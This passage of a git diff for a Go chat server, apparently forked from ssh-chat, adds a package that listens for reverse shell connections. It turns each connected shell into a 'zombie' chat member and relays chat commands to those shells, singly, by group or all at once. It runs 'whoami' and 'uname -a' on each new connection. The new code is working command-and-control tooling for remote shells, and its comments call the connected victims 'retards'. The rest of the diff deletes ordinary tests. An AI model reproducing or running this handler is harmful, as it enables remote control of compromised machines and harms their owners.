if h.GetMOTD == nil {
|
||||
return errors.New("motd reload not set")
|
||||
}
|
||||
if s, err = h.GetMOTD(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
h.SetMotd(s)
|
||||
fromMsg := fmt.Sprintf("New message of the day set by %s:", msg.From().Name())
|
||||
room.Send(message.NewAnnounceMsg(fromMsg + message.Newline + "-> " + s))
|
||||
|
||||
return nil
|
||||
},
|
||||
})*/
|
||||
return nil
|
||||
},
|
||||
})
|
||||
|
||||
/* c.Add(chat.Command{
|
||||
Op: true,
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
package shells
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
|
||||
"git.tcp.direct/kayos/teletypewriter/chat"
|
||||
"git.tcp.direct/kayos/teletypewriter/chat/message"
|
||||
)
|
||||
|
||||
func (c *Client) ID() string {
|
||||
return c.id
|
||||
}
|
||||
|
||||
func (c *Client) Name() string {
|
||||
return c.id
|
||||
}
|
||||
|
||||
func (c *Client) SetID(new string) {
|
||||
if _, ok := srv.Map[new]; ok {
|
||||
msg := fmt.Sprintf("[%s] %s", c.ID(), "ID is taken")
|
||||
chat.ExternalAnnouncements <- message.NewAnnounceMsg(msg)
|
||||
return
|
||||
}
|
||||
c.id = new
|
||||
|
||||
}
|
|
@ -0,0 +1,15 @@
|
|||
package shells
|
||||
|
||||
import (
|
||||
"github.com/rs/zerolog"
|
||||
|
||||
"git.tcp.direct/kayos/teletypewriter/config"
|
||||
)
|
||||
|
||||
var log zerolog.Logger
|
||||
|
||||
func init() {
|
||||
go func() {
|
||||
log = config.GetLogger()
|
||||
}()
|
||||
}
|
|
@ -0,0 +1,42 @@
|
|||
package shells
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net"
|
||||
"sync"
|
||||
|
||||
"git.tcp.direct/kayos/teletypewriter/config"
|
||||
)
|
||||
|
||||
func Start() {
|
||||
srv = &Server{
|
||||
Map: make(map[string]*Client),
|
||||
mu: &sync.RWMutex{},
|
||||
}
|
||||
listenstr := fmt.Sprintf("%s:%d", config.ShellAddr, config.ShellPort)
|
||||
l, err := net.Listen("tcp", listenstr)
|
||||
fmt.Printf("Listening for reverse shell connections on %v\n", listenstr)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
go func() {
|
||||
for {
|
||||
conn, err := l.Accept()
|
||||
if err != nil {
|
||||
log.Debug().Err(err).Msg("shell_accept_fail")
|
||||
}
|
||||
ip, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
|
||||
c := &Client{
|
||||
Conn: conn,
|
||||
connected: true,
|
||||
new: true,
|
||||
IP: ip,
|
||||
Group: "",
|
||||
mu: &sync.Mutex{},
|
||||
}
|
||||
c.id = keygen()
|
||||
log.Debug().Str("caller", c.id).Msg("connect")
|
||||
go srv.handleTCP(c)
|
||||
}
|
||||
}()
|
||||
}
|
|
@ -0,0 +1,185 @@
|
|||
package shells
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"fmt"
|
||||
"net"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"git.tcp.direct/kayos/teletypewriter/chat"
|
||||
"git.tcp.direct/kayos/teletypewriter/chat/message"
|
||||
)
|
||||
|
||||
var srv *Server
|
||||
|
||||
// Server is an instance of our concurrent TCP server including a map of active retards
|
||||
type Server struct {
|
||||
Map map[string]*Client
|
||||
mu *sync.RWMutex
|
||||
}
|
||||
|
||||
// Client represents a known retard
|
||||
type Client struct {
|
||||
message.Identifier
|
||||
id string
|
||||
Conn net.Conn
|
||||
|
||||
chatUser *message.User
|
||||
chatMember *chat.Member
|
||||
|
||||
mu *sync.Mutex
|
||||
IP string
|
||||
Group string
|
||||
new bool
|
||||
connected bool
|
||||
read *bufio.Reader
|
||||
}
|
||||
|
||||
func closeConn(c *Client) {
|
||||
if err := c.Conn.Close(); err != nil {
|
||||
println(err.Error())
|
||||
}
|
||||
log.Warn().Msg("closed: " + c.Conn.RemoteAddr().String())
|
||||
}
|
||||
|
||||
func (c *Client) recv(recvChan chan string) {
|
||||
for {
|
||||
if !c.connected {
|
||||
return
|
||||
}
|
||||
in, err := c.read.ReadString('\n')
|
||||
if err != nil {
|
||||
log.Debug().Err(err).
|
||||
Str("caller", c.IP).
|
||||
Msg("failed to receive")
|
||||
c.connected = false
|
||||
return
|
||||
}
|
||||
c.read.Reset(c.Conn)
|
||||
recvChan <- strings.ToLower(strings.TrimRight(in, "\n"))
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Client) send(data string) {
|
||||
if _, err := c.Conn.Write([]byte(data + "\n")); err != nil {
|
||||
c.connected = false
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Client) newChatBot() (u *message.User, m *chat.Member) {
|
||||
var err error
|
||||
u = message.NewUser(c)
|
||||
u.SetConfig(message.UserConfig{Echo: false, Quiet: true, Zombie: true, ZombieConn: c.Conn, ZombieGrp: ""})
|
||||
|
||||
var count = 0
|
||||
|
||||
m, err = chat.MainRoom.Join(u)
|
||||
|
||||
for err != nil {
|
||||
if count > 10 {
|
||||
log.Error().Str("caller", c.Conn.RemoteAddr().String()).
|
||||
Err(err).Msg("giving up")
|
||||
return nil, nil
|
||||
}
|
||||
count++
|
||||
log.Error().Str("caller", c.Conn.RemoteAddr().String()).
|
||||
Err(err).Msg("failed to join, trying other ID")
|
||||
c.id = keygen()
|
||||
u.SetID(c.id)
|
||||
|
||||
m, err = chat.MainRoom.Join(u)
|
||||
|
||||
}
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
func (c *Client) setGroup(grp string) {
|
||||
grp = strings.TrimSpace(grp)
|
||||
c.mu.Lock()
|
||||
c.Group = grp
|
||||
c.chatUser.SetGroup(grp)
|
||||
chat.MainRoom.Send(message.NewPublicMsg("[internal] group id is now: "+c.Group, c.chatUser))
|
||||
c.mu.Unlock()
|
||||
}
|
||||
|
||||
func (c *Client) handleIncoming() {
|
||||
groupprefix := "![NONE]!"
|
||||
|
||||
setgrpprefix := fmt.Sprintf("!setgroup %s", c.id)
|
||||
setgrpprefixall := "!setgroup all"
|
||||
|
||||
recvChan := make(chan string, 10)
|
||||
go c.recv(recvChan)
|
||||
|
||||
for {
|
||||
prefix := fmt.Sprintf("!%s", c.id)
|
||||
|
||||
if c.Group != "" {
|
||||
groupprefix = fmt.Sprintf("!%s", c.Group)
|
||||
}
|
||||
select {
|
||||
case in := <-c.chatUser.ZombiePipe:
|
||||
in = strings.TrimSpace(in)
|
||||
switch {
|
||||
case strings.HasPrefix(in, prefix):
|
||||
c.send(strings.TrimPrefix(in, prefix))
|
||||
continue
|
||||
case strings.HasPrefix(in, "!all"):
|
||||
c.send(strings.TrimPrefix(in, "!all"))
|
||||
continue
|
||||
case strings.HasPrefix(in, groupprefix):
|
||||
c.send(strings.TrimPrefix(in, groupprefix))
|
||||
continue
|
||||
case strings.HasPrefix(in, setgrpprefixall):
|
||||
c.setGroup(strings.TrimPrefix(in, setgrpprefixall))
|
||||
continue
|
||||
case strings.HasPrefix(in, setgrpprefix):
|
||||
c.setGroup(strings.TrimPrefix(in, setgrpprefix))
|
||||
continue
|
||||
}
|
||||
case in := <-recvChan:
|
||||
chat.MainRoom.Send(message.NewPublicMsg(in, c.chatUser))
|
||||
default:
|
||||
if !c.connected {
|
||||
return
|
||||
}
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (s *Server) handleTCP(c *Client) {
|
||||
|
||||
c.read = bufio.NewReader(c.Conn)
|
||||
if err := c.Conn.(*net.TCPConn).SetLinger(1); err != nil {
|
||||
fmt.Println("error while setting setlinger:", err.Error())
|
||||
}
|
||||
|
||||
defer func() {
|
||||
content := fmt.Sprintf("%s has disconnected", c.Conn.RemoteAddr().String())
|
||||
chat.ExternalAnnouncements <- message.NewAnnounceMsg(content)
|
||||
chat.MainRoom.Leave(c.chatUser)
|
||||
closeConn(c)
|
||||
}()
|
||||
|
||||
c.chatUser, c.chatMember = c.newChatBot()
|
||||
|
||||
go c.handleIncoming()
|
||||
|
||||
c.send("whoami")
|
||||
c.send("uname -a")
|
||||
|
||||
for {
|
||||
if !c.connected {
|
||||
log.Debug().Str("caller", c.chatUser.ID()).Msg("disconnected")
|
||||
go c.chatUser.Close()
|
||||
go chat.MainRoom.Leave(c.chatUser)
|
||||
return
|
||||
}
|
||||
c.chatUser.Consume()
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
}
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
package shells
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"encoding/binary"
|
||||
)
|
||||
|
||||
var keySize = 5
|
||||
|
||||
func randUint32() uint32 {
|
||||
b := make([]byte, 4096)
|
||||
if _, err := rand.Read(b); err != nil {
|
||||
|
||||
panic(err)
|
||||
}
|
||||
return binary.BigEndian.Uint32(b)
|
||||
}
|
||||
|
||||
const charset = "abcdefghijklmnopqrstuvwxyz1234567890"
|
||||
|
||||
func keygen() string {
|
||||
gen := func() string {
|
||||
chrlen := len(charset)
|
||||
b := make([]byte, keySize)
|
||||
for i := 0; i != keySize; i++ {
|
||||
b[i] = charset[randUint32()%uint32(chrlen)]
|
||||
}
|
||||
return string(b)
|
||||
}
|
||||
id := gen()
|
||||
_, ok := srv.Map[id]
|
||||
for ok {
|
||||
log.Debug().Msg("id taken, cycling")
|
||||
id = gen()
|
||||
}
|
||||
return id
|
||||
}
|
|
@ -12,7 +12,7 @@ import (
|
|||
)
|
||||
|
||||
var keepaliveInterval = time.Second * 30
|
||||
var keepaliveRequest = "keepalive@ssh-chat"
|
||||
var keepaliveRequest = "keepalive@sh3lly"
|
||||
|
||||
// ErrNoSessionChannel is returned when there is no session channel.
|
||||
var ErrNoSessionChannel = errors.New("no session channel")
|
||||
|
|
|
@ -1,58 +0,0 @@
|
|||
package tests
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"testing"
|
||||
|
||||
"github.com/shazow/ssh-chat/chat/message"
|
||||
)
|
||||
|
||||
func TestAwayCommands(t *testing.T) {
|
||||
cmds := &Commands{}
|
||||
InitCommands(cmds)
|
||||
|
||||
room := NewRoom()
|
||||
go room.Serve()
|
||||
defer room.Close()
|
||||
|
||||
// steps are order dependent
|
||||
// User can be "away" or "not away" using 3 commands "/away [msg]", "/away", "/back"
|
||||
// 2^3 possible cases, run all and verify state at the end
|
||||
type step struct {
|
||||
// input
|
||||
Msg string
|
||||
|
||||
// expected output
|
||||
IsUserAway bool
|
||||
AwayMessage string
|
||||
}
|
||||
awayStep := step{"/away snorkling", true, "snorkling"}
|
||||
notAwayStep := step{"/away", false, ""}
|
||||
backStep := step{"/back", false, ""}
|
||||
|
||||
steps := []step{awayStep, notAwayStep, backStep}
|
||||
cases := [][]int{
|
||||
{0, 1, 2}, {0, 2, 1}, {1, 0, 2}, {1, 2, 0}, {2, 0, 1}, {2, 1, 0},
|
||||
}
|
||||
for _, c := range cases {
|
||||
t.Run(fmt.Sprintf("Case: %d, %d, %d", c[0], c[1], c[2]), func(t *testing.T) {
|
||||
|
||||
u := message.NewUser(message.SimpleID("shark"))
|
||||
|
||||
for _, s := range []step{steps[c[0]], steps[c[1]], steps[c[2]]} {
|
||||
msg, _ := message.NewPublicMsg(s.Msg, u).ParseCommand()
|
||||
|
||||
cmds.Run(room, *msg)
|
||||
|
||||
isAway, _, awayMsg := u.GetAway()
|
||||
if isAway != s.IsUserAway {
|
||||
t.Fatalf("expected user away state '%t' not equals to actual '%t' after message '%s'", s.IsUserAway, isAway, s.Msg)
|
||||
}
|
||||
if awayMsg != s.AwayMessage {
|
||||
t.Fatalf("expected user away message '%s' not equal to actual '%s' after message '%s'", s.AwayMessage, awayMsg, s.Msg)
|
||||
}
|
||||
}
|
||||
|
||||
})
|
||||
}
|
||||
}
|
|
@ -1,89 +0,0 @@
|
|||
package tests
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"io"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestServerInit(t *testing.T) {
|
||||
config := MakeNoAuth()
|
||||
s, err := ListenSSH("localhost:badport", config)
|
||||
if err == nil {
|
||||
t.Fatal("should fail on bad port")
|
||||
}
|
||||
|
||||
s, err = ListenSSH("localhost:0", config)
|
||||
if err != nil {
|
||||
t.Error(err)
|
||||
}
|
||||
|
||||
err = s.Close()
|
||||
if err != nil {
|
||||
t.Error(err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestServeTerminals(t *testing.T) {
|
||||
signer, err := NewRandomSigner(512)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
config := MakeNoAuth()
|
||||
config.AddHostKey(signer)
|
||||
|
||||
s, err := ListenSSH("localhost:0", config)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
terminals := make(chan *Terminal)
|
||||
s.HandlerFunc = func(term *Terminal) {
|
||||
terminals <- term
|
||||
}
|
||||
go s.Serve()
|
||||
|
||||
go func() {
|
||||
// Accept one terminal, read from it, echo back, close.
|
||||
term := <-terminals
|
||||
term.SetPrompt("> ")
|
||||
|
||||
line, err := term.ReadLine()
|
||||
if err != nil {
|
||||
t.Error(err)
|
||||
}
|
||||
_, err = term.Write([]byte("echo: " + line + "\n"))
|
||||
if err != nil {
|
||||
t.Error(err)
|
||||
}
|
||||
|
||||
term.Close()
|
||||
}()
|
||||
|
||||
host := s.Addr().String()
|
||||
name := "foo"
|
||||
|
||||
err = ConnectShell(host, name, func(r io.Reader, w io.WriteCloser) error {
|
||||
// Consume if there is anything
|
||||
buf := new(bytes.Buffer)
|
||||
w.Write([]byte("hello\r\n"))
|
||||
|
||||
buf.Reset()
|
||||
_, err := io.Copy(buf, r)
|
||||
|
||||
expected := "> hello\r\necho: hello\r\n"
|
||||
actual := buf.String()
|
||||
if actual != expected {
|
||||
if err != nil {
|
||||
t.Error(err)
|
||||
}
|
||||
t.Errorf("Got %q; expected %q", actual, expected)
|
||||
}
|
||||
s.Close()
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
}
|
|
@ -1,506 +0,0 @@
|
|||
package tests
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"reflect"
|
||||
"testing"
|
||||
|
||||
"github.com/shazow/ssh-chat/chat/message"
|
||||
"github.com/shazow/ssh-chat/set"
|
||||
)
|
||||
|
||||
// Used for testing
|
||||
type MockScreen struct {
|
||||
buffer []byte
|
||||
}
|
||||
|
||||
func (s *MockScreen) Write(data []byte) (n int, err error) {
|
||||
s.buffer = append(s.buffer, data...)
|
||||
return len(data), nil
|
||||
}
|
||||
|
||||
func (s *MockScreen) Read(p *[]byte) (n int, err error) {
|
||||
*p = s.buffer
|
||||
s.buffer = []byte{}
|
||||
return len(*p), nil
|
||||
}
|
||||
|
||||
func (s *MockScreen) Close() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func TestRoomServe(t *testing.T) {
|
||||
ch := NewRoom()
|
||||
ch.Send(message.NewAnnounceMsg("hello"))
|
||||
|
||||
received := <-ch.broadcast
|
||||
actual := received.String()
|
||||
expected := " * hello"
|
||||
|
||||
if actual != expected {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
}
|
||||
|
||||
type ScreenedUser struct {
|
||||
user *message.User
|
||||
screen *MockScreen
|
||||
}
|
||||
|
||||
func TestIgnore(t *testing.T) {
|
||||
var buffer []byte
|
||||
|
||||
ch := NewRoom()
|
||||
go ch.Serve()
|
||||
defer ch.Close()
|
||||
|
||||
// Create 3 users, join the room and clear their screen buffers
|
||||
users := make([]ScreenedUser, 3)
|
||||
for i := 0; i < 3; i++ {
|
||||
screen := &MockScreen{}
|
||||
user := message.NewUserScreen(message.SimpleID(fmt.Sprintf("user%d", i)), screen)
|
||||
users[i] = ScreenedUser{
|
||||
user: user,
|
||||
screen: screen,
|
||||
}
|
||||
|
||||
_, err := ch.Join(user)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
}
|
||||
|
||||
for _, u := range users {
|
||||
for i := 0; i < 3; i++ {
|
||||
u.user.HandleMsg(u.user.ConsumeOne())
|
||||
u.screen.Read(&buffer)
|
||||
}
|
||||
}
|
||||
|
||||
// Use some handy variable names for distinguish between roles
|
||||
ignorer := users[0]
|
||||
ignored := users[1]
|
||||
other := users[2]
|
||||
|
||||
// test ignoring unexisting user
|
||||
if err := sendCommand("/ignore test", ignorer, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Err: user not found: test"+message.Newline)
|
||||
|
||||
// test ignoring existing user
|
||||
if err := sendCommand("/ignore "+ignored.user.Name(), ignorer, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Ignoring: "+ignored.user.Name()+message.Newline)
|
||||
|
||||
// ignoring the same user twice returns an error message and doesn't add the user twice
|
||||
if err := sendCommand("/ignore "+ignored.user.Name(), ignorer, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Err: user already ignored: user1"+message.Newline)
|
||||
if ignoredList := ignorer.user.Ignored.ListPrefix(""); len(ignoredList) != 1 {
|
||||
t.Fatalf("should have %d ignored users, has %d", 1, len(ignoredList))
|
||||
}
|
||||
|
||||
// when an emote is sent by an ignored user, it should not be displayed for ignorer
|
||||
ch.HandleMsg(message.NewEmoteMsg("is crying", ignored.user))
|
||||
if ignorer.user.HasMessages() {
|
||||
t.Fatal("should not have emote messages")
|
||||
}
|
||||
|
||||
other.user.HandleMsg(other.user.ConsumeOne())
|
||||
other.screen.Read(&buffer)
|
||||
expectOutput(t, buffer, "** "+ignored.user.Name()+" is crying"+message.Newline)
|
||||
|
||||
// when a message is sent from the ignored user, it is delivered to non-ignoring users
|
||||
ch.HandleMsg(message.NewPublicMsg("hello", ignored.user))
|
||||
other.user.HandleMsg(other.user.ConsumeOne())
|
||||
other.screen.Read(&buffer)
|
||||
expectOutput(t, buffer, ignored.user.Name()+": hello"+message.Newline)
|
||||
|
||||
// ensure ignorer doesn't have received any message
|
||||
if ignorer.user.HasMessages() {
|
||||
t.Fatal("should not have messages")
|
||||
}
|
||||
|
||||
// `/ignore` returns a list of ignored users
|
||||
if err := sendCommand("/ignore", ignorer, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> 1 ignored: "+ignored.user.Name()+message.Newline)
|
||||
|
||||
// `/unignore [USER]` removes the user from ignored ones
|
||||
if err := sendCommand("/unignore "+ignored.user.Name(), users[0], ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> No longer ignoring: user1"+message.Newline)
|
||||
|
||||
if err := sendCommand("/ignore", users[0], ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> 0 users ignored."+message.Newline)
|
||||
|
||||
if ignoredList := ignorer.user.Ignored.ListPrefix(""); len(ignoredList) != 0 {
|
||||
t.Fatalf("should have %d ignored users, has %d", 0, len(ignoredList))
|
||||
}
|
||||
|
||||
// after unignoring a user, its messages can be received again
|
||||
ch.HandleMsg(message.NewPublicMsg("hello again!", ignored.user))
|
||||
|
||||
// ensure ignorer has received the message
|
||||
if !ignorer.user.HasMessages() {
|
||||
t.Fatal("should have messages")
|
||||
}
|
||||
ignorer.user.HandleMsg(ignorer.user.ConsumeOne())
|
||||
ignorer.screen.Read(&buffer)
|
||||
expectOutput(t, buffer, ignored.user.Name()+": hello again!"+message.Newline)
|
||||
}
|
||||
|
||||
func TestMute(t *testing.T) {
|
||||
var buffer []byte
|
||||
|
||||
ch := NewRoom()
|
||||
go ch.Serve()
|
||||
defer ch.Close()
|
||||
|
||||
// Create 3 users, join the room and clear their screen buffers
|
||||
users := make([]ScreenedUser, 3)
|
||||
members := make([]*Member, 3)
|
||||
for i := 0; i < 3; i++ {
|
||||
screen := &MockScreen{}
|
||||
user := message.NewUserScreen(message.SimpleID(fmt.Sprintf("user%d", i)), screen)
|
||||
users[i] = ScreenedUser{
|
||||
user: user,
|
||||
screen: screen,
|
||||
}
|
||||
|
||||
member, err := ch.Join(user)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
members[i] = member
|
||||
}
|
||||
|
||||
for _, u := range users {
|
||||
for i := 0; i < 3; i++ {
|
||||
u.user.HandleMsg(u.user.ConsumeOne())
|
||||
u.screen.Read(&buffer)
|
||||
}
|
||||
}
|
||||
|
||||
// Use some handy variable names for distinguish between roles
|
||||
muter := users[0]
|
||||
muted := users[1]
|
||||
other := users[2]
|
||||
|
||||
members[0].IsOp = true
|
||||
|
||||
// test muting unexisting user
|
||||
if err := sendCommand("/mute test", muter, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Err: user not found"+message.Newline)
|
||||
|
||||
// test muting by non-op
|
||||
if err := sendCommand("/mute "+muted.user.Name(), other, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Err: must be op"+message.Newline)
|
||||
|
||||
// test muting existing user
|
||||
if err := sendCommand("/mute "+muted.user.Name(), muter, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Muted: "+muted.user.Name()+message.Newline)
|
||||
|
||||
if got, want := members[1].IsMuted(), true; got != want {
|
||||
t.Error("muted user failed to set mute flag")
|
||||
}
|
||||
|
||||
// when an emote is sent by a muted user, it should not be displayed for anyone
|
||||
ch.HandleMsg(message.NewPublicMsg("hello!", muted.user))
|
||||
ch.HandleMsg(message.NewEmoteMsg("is crying", muted.user))
|
||||
|
||||
if muter.user.HasMessages() {
|
||||
muter.user.HandleMsg(muter.user.ConsumeOne())
|
||||
muter.screen.Read(&buffer)
|
||||
t.Errorf("muter should not have messages: %s", buffer)
|
||||
}
|
||||
if other.user.HasMessages() {
|
||||
other.user.HandleMsg(other.user.ConsumeOne())
|
||||
other.screen.Read(&buffer)
|
||||
t.Errorf("other should not have messages: %s", buffer)
|
||||
}
|
||||
|
||||
// test unmuting
|
||||
if err := sendCommand("/mute "+muted.user.Name(), muter, ch, &buffer); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
expectOutput(t, buffer, "-> Unmuted: "+muted.user.Name()+message.Newline)
|
||||
|
||||
ch.HandleMsg(message.NewPublicMsg("hello again!", muted.user))
|
||||
other.user.HandleMsg(other.user.ConsumeOne())
|
||||
other.screen.Read(&buffer)
|
||||
expectOutput(t, buffer, muted.user.Name()+": hello again!"+message.Newline)
|
||||
}
|
||||
|
||||
func expectOutput(t *testing.T, buffer []byte, expected string) {
|
||||
t.Helper()
|
||||
|
||||
bytes := []byte(expected)
|
||||
if !reflect.DeepEqual(buffer, bytes) {
|
||||
t.Errorf("Got: %q; Expected: %q", buffer, expected)
|
||||
}
|
||||
}
|
||||
|
||||
func sendCommand(cmd string, mock ScreenedUser, room *Room, buffer *[]byte) error {
|
||||
msg, ok := message.NewPublicMsg(cmd, mock.user).ParseCommand()
|
||||
if !ok {
|
||||
return errors.New("cannot parse command message")
|
||||
}
|
||||
|
||||
room.Send(msg)
|
||||
mock.user.HandleMsg(mock.user.ConsumeOne())
|
||||
mock.screen.Read(buffer)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func TestRoomJoin(t *testing.T) {
|
||||
var expected, actual []byte
|
||||
|
||||
s := &MockScreen{}
|
||||
u := message.NewUserScreen(message.SimpleID("foo"), s)
|
||||
|
||||
ch := NewRoom()
|
||||
go ch.Serve()
|
||||
defer ch.Close()
|
||||
|
||||
_, err := ch.Join(u)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte(" * foo joined. (Connected: 1)" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
|
||||
ch.Send(message.NewSystemMsg("hello", u))
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte("-> hello" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
|
||||
ch.Send(message.ParseInput("/me says hello.", u))
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte("** foo says hello." + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
}
|
||||
|
||||
func TestRoomDoesntBroadcastAnnounceMessagesWhenQuiet(t *testing.T) {
|
||||
u := message.NewUser(message.SimpleID("foo"))
|
||||
u.SetConfig(message.UserConfig{
|
||||
Quiet: true,
|
||||
})
|
||||
|
||||
ch := NewRoom()
|
||||
defer ch.Close()
|
||||
|
||||
_, err := ch.Join(u)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
// Drain the initial Join message
|
||||
<-ch.broadcast
|
||||
|
||||
go func() {
|
||||
/*
|
||||
for {
|
||||
msg := u.ConsumeChan()
|
||||
if _, ok := msg.(*message.AnnounceMsg); ok {
|
||||
t.Errorf("Got unexpected `%T`", msg)
|
||||
}
|
||||
}
|
||||
*/
|
||||
// XXX: Fix this
|
||||
}()
|
||||
|
||||
// Call with an AnnounceMsg and all the other types
|
||||
// and assert we received only non-announce messages
|
||||
ch.HandleMsg(message.NewAnnounceMsg("Ignored"))
|
||||
// Assert we still get all other types of messages
|
||||
ch.HandleMsg(message.NewEmoteMsg("hello", u))
|
||||
ch.HandleMsg(message.NewSystemMsg("hello", u))
|
||||
ch.HandleMsg(message.NewPrivateMsg("hello", u, u))
|
||||
ch.HandleMsg(message.NewPublicMsg("hello", u))
|
||||
}
|
||||
|
||||
func TestRoomQuietToggleBroadcasts(t *testing.T) {
|
||||
u := message.NewUser(message.SimpleID("foo"))
|
||||
u.SetConfig(message.UserConfig{
|
||||
Quiet: true,
|
||||
})
|
||||
|
||||
ch := NewRoom()
|
||||
defer ch.Close()
|
||||
|
||||
_, err := ch.Join(u)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
// Drain the initial Join message
|
||||
<-ch.broadcast
|
||||
|
||||
u.SetConfig(message.UserConfig{
|
||||
Quiet: false,
|
||||
})
|
||||
|
||||
expectedMsg := message.NewAnnounceMsg("Ignored")
|
||||
ch.HandleMsg(expectedMsg)
|
||||
msg := u.ConsumeOne()
|
||||
if _, ok := msg.(*message.AnnounceMsg); !ok {
|
||||
t.Errorf("Got: `%T`; Expected: `%T`", msg, expectedMsg)
|
||||
}
|
||||
|
||||
u.SetConfig(message.UserConfig{
|
||||
Quiet: true,
|
||||
})
|
||||
|
||||
ch.HandleMsg(message.NewAnnounceMsg("Ignored"))
|
||||
ch.HandleMsg(message.NewSystemMsg("hello", u))
|
||||
msg = u.ConsumeOne()
|
||||
if _, ok := msg.(*message.AnnounceMsg); ok {
|
||||
t.Errorf("Got unexpected `%T`", msg)
|
||||
}
|
||||
}
|
||||
|
||||
func TestQuietToggleDisplayState(t *testing.T) {
|
||||
var expected, actual []byte
|
||||
|
||||
s := &MockScreen{}
|
||||
u := message.NewUserScreen(message.SimpleID("foo"), s)
|
||||
|
||||
ch := NewRoom()
|
||||
go ch.Serve()
|
||||
defer ch.Close()
|
||||
|
||||
_, err := ch.Join(u)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte(" * foo joined. (Connected: 1)" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
|
||||
ch.Send(message.ParseInput("/quiet", u))
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte("-> Quiet mode is toggled ON" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
|
||||
ch.Send(message.ParseInput("/quiet", u))
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte("-> Quiet mode is toggled OFF" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
}
|
||||
|
||||
func TestRoomNames(t *testing.T) {
|
||||
var expected, actual []byte
|
||||
|
||||
s := &MockScreen{}
|
||||
u := message.NewUserScreen(message.SimpleID("foo"), s)
|
||||
|
||||
ch := NewRoom()
|
||||
go ch.Serve()
|
||||
defer ch.Close()
|
||||
|
||||
_, err := ch.Join(u)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
expected = []byte(" * foo joined. (Connected: 1)" + message.Newline)
|
||||
s.Read(&actual)
|
||||
if !reflect.DeepEqual(actual, expected) {
|
||||
t.Errorf("Got: %q; Expected: %q", actual, expected)
|
||||
}
|
||||
|
||||
ch.Send(message.ParseInput("/names", u))
|
||||
|
||||
u.HandleMsg(u.ConsumeOne())
|
||||
